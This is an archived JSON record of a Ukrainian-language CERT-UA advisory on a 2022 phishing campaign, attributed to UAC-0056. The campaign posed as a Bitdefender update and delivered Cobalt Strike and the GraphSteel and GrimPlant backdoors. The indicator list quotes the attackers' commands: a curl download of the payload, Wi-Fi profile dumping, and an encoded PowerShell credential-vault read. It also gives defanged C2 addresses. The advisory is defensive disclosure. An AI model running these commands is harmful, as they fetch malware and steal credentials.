{
	"id": "8e87abd1-d572-43e8-8eab-cca42571df1e",
	"created_at": "2026-04-06T00:13:49.82236Z",
	"updated_at": "2026-04-10T03:35:37.737935Z",
	"deleted_at": null,
	"sha1_hash": "f2b5eddc4d1b58ab0a7fae6a6dccee8ff5212407",
	"title": "CERT-UA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1475617,
	"plain_text": "CERT-UA\r\nArchived: 2026-04-05 14:50:41 UTC\r\nОновлено 12.03.2022\r\nЗагальна інформація\r\nУрядовою командою реагування на комп’ютерні надзвичайні події України CERT-UA від суб'єктів\r\nкоординації отримано повідомлення про масове розповсюдження електронних листів від імені державних\r\nорганів України з інструкціями щодо підвищення рівня інформаційної безпеки. У тілі листа знаходиться\r\nпосилання на веб-сайт hxxps://forkscenter[.]fr/, з якого пропонується завантажити \"критичні оновлення\" у\r\nвигляді файлу \"BitdefenderWindowsUpdatePackage.exe\" розміром близько 60МБ.\r\nЗ'ясовано, що згаданий файл забезпечить виконання завантажувача \"alt.exe\", який здійснить завантаження\r\nфайлів \"one.exe\" та \"dropper.exe\" з сервісу Discord та їхній запуск. В рамках дослідження визначено, що\r\nзапуск \"one.exe\" призведе до ураження комп'ютера шкідливою програмою Cobalt Strike Beacon, а також\r\nзавантаження і виконання файлу \"wisw.exe\", який, у свою чергу, мав би завантажити з Discord та виконати\r\nфайл \"cesdf.exe\" (не доступний на момент аналізу).\r\nФайл \"dropper.exe\" здійснить завантаження, base64-декодування, збереження на диск та виконання файлу\r\n\"java-sdk.exe\". Останній, окрім забезпечення персистентності через реєстр Windows, також здійснить\r\nзавантаження, base64-декодуання, збереження на диск та виконання двох інших файлів: \"microsoft-cortana.exe\", що класифіковано як бекдор GraphSteel, та \"oracle-java.exe\", який класифіковано як бекдор\r\nGrimPlant.\r\nЗауважимо, що EXE-файли (завантажувачі з Discord) захищено протектором Themida.\r\nЗ середнім рівнем впевненості асоціюємо виявлену активність з діяльністю групи UAC-0056.\r\nІндикатори компрометації \r\nФайли: \r\nca9290709843584aecbd6564fb978bd6 Інструкція з антивірусного захисту.doc (документ-приманка)\r\ncf204319f7397a6a31ecf76c9531a549 Інструкція користувачів.doc (документ-приманка)\r\nb8b7a10dcc0dad157191620b5d4e5312 BitdefenderWindowsUpdatePackage.exe\r\n2fdf9f3a25e039a41e743e19550d4040 alt.exe (Discord downloader)\r\naa5e8268e741346c76ebfd1f27941a14 one.exe (містить Cobalt Strike Beacon)\r\n9ad4a2dfd4cb49ef55f2acd320659b83 wisw.exe (Discord downloader) (2022-03-06 10:36:07)\r\n15c525b74b7251cfa1f7c471975f3f95 dropper.exe (Go downloader)\r\nc8bf238641621212901517570e96fae7 java-sdk.exe (Go downloader)\r\n4f11abdb96be36e3806bada5b8b2b8f8 oracle-java.exe (GrimPlant)\r\n9ea3aaaeb15a074cd617ee1dfdda2c26 microsoft-cortana.exe (GraphSteel) (2022-03-01 17:23:26)\r\nhttps://cert.gov.ua/article/37704\r\nPage 1 of 3\n\nМережеві: \r\nhxxps://forkscenter[.]fr/BitdefenderWindowsUpdatePackage.exe\r\nhxxps://forkscenter[.]fr/Sdghrt_umrj6/wisw.exe\r\nhxxps://cdn.discordapp[.]com/attachments/947916997713358890/949948174636830761/one.exe\r\nhxxps://cdn.discordapp[.]com/attachments/947916997713358890/949948174838165524/dropper.exe\r\nhxxps://cdn.discordapp[.]com/attachments/947916997713358890/949978571680673802/cesdf.exe\r\nhxxps://nirsoft[.]me/s/2MYmbwpSJLZRAtXRgNTAUjJSH6SSoicLPIrQl/field-keywords/\r\nhxxps://nirsoft[.]me/nEDFzTtoCbUfp9BtSZlaq6ql8v6yYb/avp/amznussraps/\r\nhxxp://45[.]84.0.116:443/i\r\nhxxp://45[.]84.0.116:443/m\r\nhxxp://45[.]84.0.116:443/p\r\nws://45[.]84.0.116:443/c\r\nforkscenter[.]fr (2022-01-29)\r\nnirsoft[.]me (2022-02-17)\r\n45[.]84.0.116\r\n156[.]146.50.5\r\n-hobot- (User-Agent)\r\nХостові: \r\n%TMP%\\alt.exe\r\n%PROGRAMDATA%\\one.exe\r\n%PROGRAMDATA%\\dropper.exe\r\n%USERPROFILE%\\.java-sdk\\java-sdk.exe\r\n%USERPROFILE%\\.java-sdk\\oracle-java.exe\r\n%USERPROFILE%\\.java-sdk\\microsoft-cortana.exe\r\n%USERPROFILE%\\AppData\\Local\\Temp\\wisw.exe\r\n%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\BitdefenderControl.lnk\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Java-SDK\r\nC:\\Windows\\System32\\cmd.exe /C cd %USERPROFILE%\\AppData\\Local\\Temp\\ \u0026 curl -O hxxps://forkscenter[.]f\r\nC:\\Windows\\System32\\cmd.exe /C cd / \u0026 dir /S \u003e %USERPROFILE%\\AppData\\Local\\Temp\\Rsjdjfvj.txt \u0026 ipconf\r\nipconfig /all\r\ncmd /Q /C netsh wlan show profiles\r\nnetsh wlan show profiles\r\npowershell /Q /C -encodedCommand WwB2AG8AaQBkAF0AWwBXAGkAbgBkAG8AdwBzAC4AUwBlAGMAdQByAGkAdAB5AC4AQwBy\r\n[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRun\r\nДодаткова інформація \r\nGraphSteel - шкідлива програма, розроблена з використанням мови програмування GoLang. Визначає\r\nбазову інформацію про комп'ютер (hostname, username, IP-адреса), викрадення автентифікаційних даних,\r\nhttps://cert.gov.ua/article/37704\r\nPage 2 of 3\n\nвиконання команд, вивантаження файлів. Для комунікації з сервером управління використовується\r\nWebSocket та GraphQL; інформаційні потоки шифруються за допомогою AES та кодуються base64.\r\nGrimPlant - шкідлива програма, розроблена з використанням мови програмування GoLang. Визначає базову\r\nінформацію про комп'ютер (IP-адреса, Hostname, OS, Username, HomeDir), а також виконує команди,\r\nотримані з серверу управління, та відправляє результат їх виконання. В якості протоколу використовується\r\ngRPC (Protocol Buffers + HTTP/2 + SSL). Адреса серверу управління передається як аргумент в\r\nкомандному рядку.\r\nГрафічні зображення\r\nSource: https://cert.gov.ua/article/37704\r\nhttps://cert.gov.ua/article/37704\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cert.gov.ua/article/37704"
	],
	"report_names": [
		"37704"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "eecf54a2-2deb-41e5-9857-fed94a53f858",
			"created_at": "2023-01-06T13:46:39.349959Z",
			"updated_at": "2026-04-10T02:00:03.296196Z",
			"deleted_at": null,
			"main_name": "SaintBear",
			"aliases": [
				"Bleeding Bear",
				"Cadet Blizzard",
				"Nascent Ursa",
				"Nodaria",
				"Storm-0587",
				"DEV-0587",
				"Saint Bear",
				"EMBER BEAR",
				"UNC2589",
				"TA471",
				"UAC-0056",
				"FROZENVISTA",
				"Lorec53",
				"Lorec Bear"
			],
			"source_name": "MISPGALAXY:SaintBear",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c28760b2-5ec6-42ad-852f-be00372a7ce4",
			"created_at": "2022-10-27T08:27:13.172734Z",
			"updated_at": "2026-04-10T02:00:05.279557Z",
			"deleted_at": null,
			"main_name": "Ember Bear",
			"aliases": [
				"Ember Bear",
				"UNC2589",
				"Bleeding Bear",
				"DEV-0586",
				"Cadet Blizzard",
				"Frozenvista",
				"UAC-0056"
			],
			"source_name": "MITRE:Ember Bear",
			"tools": [
				"P.A.S. Webshell",
				"CrackMapExec",
				"ngrok",
				"reGeorg",
				"WhisperGate",
				"Saint Bot",
				"PsExec",
				"Rclone",
				"Impacket"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "03a6f362-cbab-4ce9-925d-306b8c937bf1",
			"created_at": "2024-11-01T02:00:52.635907Z",
			"updated_at": "2026-04-10T02:00:05.339384Z",
			"deleted_at": null,
			"main_name": "Saint Bear",
			"aliases": [
				"Saint Bear",
				"Storm-0587",
				"TA471",
				"UAC-0056",
				"Lorec53"
			],
			"source_name": "MITRE:Saint Bear",
			"tools": [
				"OutSteel",
				"Saint Bot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "083d63b2-3eee-42a8-b1bd-54e657a229e8",
			"created_at": "2022-10-25T16:07:24.143338Z",
			"updated_at": "2026-04-10T02:00:04.879634Z",
			"deleted_at": null,
			"main_name": "SaintBear",
			"aliases": [
				"Ember Bear",
				"FROZENVISTA",
				"G1003",
				"Lorec53",
				"Nascent Ursa",
				"Nodaria",
				"SaintBear",
				"Storm-0587",
				"TA471",
				"UAC-0056",
				"UNC2589"
			],
			"source_name": "ETDA:SaintBear",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Elephant Client",
				"Elephant Implant",
				"GraphSteel",
				"Graphiron",
				"GrimPlant",
				"OutSteel",
				"Saint Bot",
				"SaintBot",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434429,
	"ts_updated_at": 1775792137,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f2b5eddc4d1b58ab0a7fae6a6dccee8ff5212407.pdf",
		"text": "https://archive.orkl.eu/f2b5eddc4d1b58ab0a7fae6a6dccee8ff5212407.txt",
		"img": "https://archive.orkl.eu/f2b5eddc4d1b58ab0a7fae6a6dccee8ff5212407.jpg"
	}
}